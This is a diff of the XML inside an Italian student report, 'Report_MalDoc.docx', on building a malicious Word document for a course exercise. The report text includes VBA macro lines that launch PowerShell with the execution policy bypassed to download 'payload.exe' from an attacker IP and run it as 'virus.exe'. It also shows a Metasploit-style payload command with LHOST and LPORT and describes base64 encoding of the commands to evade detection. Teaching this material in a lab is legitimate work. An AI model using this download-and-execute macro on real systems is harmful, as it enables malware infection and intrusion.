-      </w:r>
-      <w:r>
-        <w:t>virus.exe'"</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, 0, True</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
@@ -362,108 +446,6 @@
           <w:color w:val="92D050"/>
         </w:rPr>
         <w:t>Esegui</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> il </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>comando</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> PowerShell per </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>scaricare</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> il file </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>malevolo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>shell.Run</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> "powershell.exe -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>NoProfile</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ExecutionPolicy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Bypass -Command " &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>comandoDaEseguire</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, 0, True</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>' Eseg</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>ui</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1402,19 +1384,7 @@
         <w:rPr>
           <w:color w:val="92D050"/>
         </w:rPr>
-        <w:t xml:space="preserve"> in</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> input in</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> in input in </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2823,6 +2793,22 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:t xml:space="preserve"> con un </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>statico</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
         <w:t xml:space="preserve">, il software </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -2887,7 +2873,13 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> I </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3026,7 +3018,10 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> LHOST </w:t>
+        <w:t xml:space="preserve"> LHOST</w:t>
+      </w:r>
+      <w:r>
+        <w:t>=</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3034,7 +3029,13 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> LPORT porta -f exe &gt; payload.exe</w:t>
+        <w:t xml:space="preserve"> LPORT</w:t>
+      </w:r>
+      <w:r>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:t>porta -f exe &gt; payload.exe</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3125,7 +3126,10 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>set LPORT 400</w:t>
+        <w:t xml:space="preserve">set LPORT </w:t>
+      </w:r>
+      <w:r>
+        <w:t>porta</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3306,6 +3310,33 @@
         <w:t>installato</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>permettere</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>l’apertura</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> del document Word </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>

--- a/Report_MalDoc.docx
+++ b/Report_MalDoc.docx
@@ -26,13 +26,22 @@
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t>Nome Cognome</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Nome </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
+        <w:t>Cognome</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
         <w:t xml:space="preserve"> Farina Christian</w:t>
       </w:r>
     </w:p>
@@ -44,6 +53,7 @@
           <w:iCs/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -51,6 +61,7 @@
         </w:rPr>
         <w:t>Matricola</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -101,7 +112,87 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>In questa sezione dovete presentare il codice del comando Powershel e le tecniche adottate per codificarlo in base 64.</w:t>
+        <w:t xml:space="preserve">In </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>questa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sezione</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dovete</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>presentare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codice</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> del </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Powershel</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> e le </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tecniche</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>adottate</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codificarlo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> in base 64.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -120,11 +211,34 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>comandoDaEseguire=</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> "(New-Object Net.WebClient).DownloadFile('" &amp; "http://</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandoDaEseguire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> "(New-Object </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Net.WebClient</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>).</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>DownloadFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>('" &amp; "http://</w:t>
       </w:r>
       <w:r>
         <w:t>ipattaccante</w:t>
@@ -138,9 +252,11 @@
       <w:r>
         <w:t>/payload.exe" &amp; "', '" &amp; "</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>percorso</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>\</w:t>
       </w:r>
@@ -150,8 +266,21 @@
       <w:r>
         <w:t>\</w:t>
       </w:r>
-      <w:r>
-        <w:t>voglio\salvare\</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>voglio</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>salvare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>\</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">virus.exe </w:t>
@@ -167,9 +296,11 @@
       <w:r>
         <w:t xml:space="preserve"> " &amp; '</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>percorso</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>\</w:t>
       </w:r>
@@ -180,13 +311,20 @@
         <w:t>\</w:t>
       </w:r>
       <w:r>
-        <w:t>è\salvato\</w:t>
+        <w:t>è\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>salvato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>\</w:t>
       </w:r>
       <w:r>
         <w:t>virus.exe'"</w:t>
       </w:r>
     </w:p>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:rPr>
@@ -197,12 +335,96 @@
         <w:rPr>
           <w:color w:val="92D050"/>
         </w:rPr>
-        <w:t>' Esegui il comando PowerShell per scaricare il file malevolo</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    shell.Run "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command " &amp; comandoDaEseguire, 0, True</w:t>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Esegui</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> PowerShell per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>scaricare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>shell.Run</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "powershell.exe -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>NoProfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExecutionPolicy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Bypass -Command " &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandoDaEseguire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, 0, True</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -215,12 +437,88 @@
         <w:rPr>
           <w:color w:val="92D050"/>
         </w:rPr>
-        <w:t>' Esegui il comando PowerShell per eseguire il file malevolo</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    shell.Run "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command " &amp; comandoDaEseguire2, 0, True</w:t>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Esegui</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> PowerShell per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>eseguire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>shell.Run</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "powershell.exe -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>NoProfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExecutionPolicy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Bypass -Command " &amp; comandoDaEseguire2, 0, True</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -244,35 +542,323 @@
         <w:t>P</w:t>
       </w:r>
       <w:r>
-        <w:t>er la codifica ho utilizzato due metodi in VBA che codificano stringh</w:t>
+        <w:t xml:space="preserve">er la </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codifica</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ho </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>utilizzato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> due </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>metodi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> in VBA </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>che</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codificano</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stringh</w:t>
       </w:r>
       <w:r>
         <w:t>e</w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> date in input, in un contest reale le stringhe sarebbero state date direttamente codificate come input del decodificatore di VBA, tuttavia per fini didattici ho inserito I due metodi all’interno del codice del file malevolo per mostrarne il funzionamento. Il programma infatti esegue I seguenti passaggi:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>1 Inizializza le stringhe coi comandi</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>2 Codifica le stringhe</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>3 Decodifica le stringhe</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>4 Esegue I comandi decodificati</w:t>
-      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> date in input, in un contest </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>reale</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> le </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stringhe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sarebbero</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> state date </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>direttamente</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codificate</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> come input del </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>decodificatore</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> di VBA, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tuttavia</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>fini</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>didattici</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ho </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>inserito</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> I due </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>metodi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>all’interno</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> del </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codice</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> del file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mostrarne</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>funzionamento</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. Il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>programma</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>infatti</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>esegue</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>seguenti</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>passaggi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Inizializza</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> le </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stringhe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>coi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">2 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Codifica</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> le </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stringhe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">3 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Decodifica</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> le </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stringhe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">4 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Esegue</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>decodificati</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -286,6 +872,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>METODI USATI PER CODIFICARE I COMANDI</w:t>
       </w:r>
     </w:p>
@@ -299,8 +886,88 @@
         <w:rPr>
           <w:color w:val="92D050"/>
         </w:rPr>
-        <w:t>' codifica una stringa in input in base 64 e restituisce la stringa codificata</w:t>
-      </w:r>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>codifica</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
